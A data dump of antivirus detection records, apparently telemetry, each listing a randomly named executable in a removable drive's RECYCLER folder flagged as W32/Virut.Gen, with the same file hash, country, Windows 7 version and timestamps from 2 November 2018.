  Row(detection=Row(filename='fbzpigxh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\FBZpiGxH.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yqzeslwi.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\yQZESLWI.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ckveunpf.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\ckvEUNPf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rtflrkmr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\RTFlRkMR.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whclzyof.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\WHcLZyOf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fqlgznuo.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\FQlgZNUO.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tydpaclt.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\TyDpaclt.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nfemykxv.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\nFEMykXV.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dbpobyoh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\DbPobyOh.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uzzjuabc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\UZZJuABC.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iwjylcbb.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\IWjyLcbB.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ivsttveu.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\IvSTtVEU.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mevhiqqt.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\meVhiqqT.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cynqmzsk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\CyNqmZSk.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qmxyejtx.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\qmxYEjTx.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kvcphosf.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\kvCphOsf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zhzovaqg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\ZhZovAqG.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kuotpwpv.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\kuotPWPv.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uckqbcbs.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\uCKQBcbs.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qdooelez.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\QDoOElEZ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ywqrmjnw.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\ywqrmjnw.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ecxjptha.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\eCxJPtha.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:13:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='luiswdlb.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LUIswdLb.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qdcgdfps.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\QDCgdFPs.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cavibqui.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\caVIBqui.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dworrzrt.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\dwORRZrt.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lmgmcfra.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\lmgmCfRa.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbjndkcn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\nBjnDkCN.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kcqtmccg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\kCQtmcCg.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tutpmguh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\tUtpMGUh.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gltaqcdl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\gLTaqcdl.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lxcpvnor.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LxcPvnOR.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hahjifsu.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\HAhJifsu.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hywpwirl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\hYwpwIrL.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whbwxugn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\WHBwXuGN.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wtgdhfdr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\wtgdHfdr.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ukwxpjvd.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\UKWXPJvD.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eejbxmoe.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\eEJBXmoE.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wwbfyizj.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\wwBFYiZj.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rgnlwnvr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\RGnlWnVR.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cbgqzynn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\cbGqZynN.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bnqrcqbk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\bnQRCQbK.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tdcelsxz.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\TDcelsxZ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jrdlahmc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\jRdLaHmC.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vvtqhhhd.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\vVtqHHhD.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dobjbwfm.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\dobjBwFm.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xckvdmgz.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\xCKVdmGZ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='plrkvyej.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\PLrKVYEJ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wweqirca.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\WweqIrcA.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:30:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bhvuildk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\bhvuIlDK.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hrrvdpkn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\hrrvdPkn.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:30:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='veejsqce.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\veeJsQCE.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ruooyknk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\RuooYkNK.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wjbqiiul.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\WJbQIiUL.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xwgxuzdc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\XWgxuZdc.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='abgyfegn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\abGyfEGn.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhgtiddi.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\mhgTIDDi.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='euhjjvgk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\eUHjJvGk.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='luspvgpr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LuSpvgpR.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:57Z'), dt=datetime.date(2018, 11, 2)),
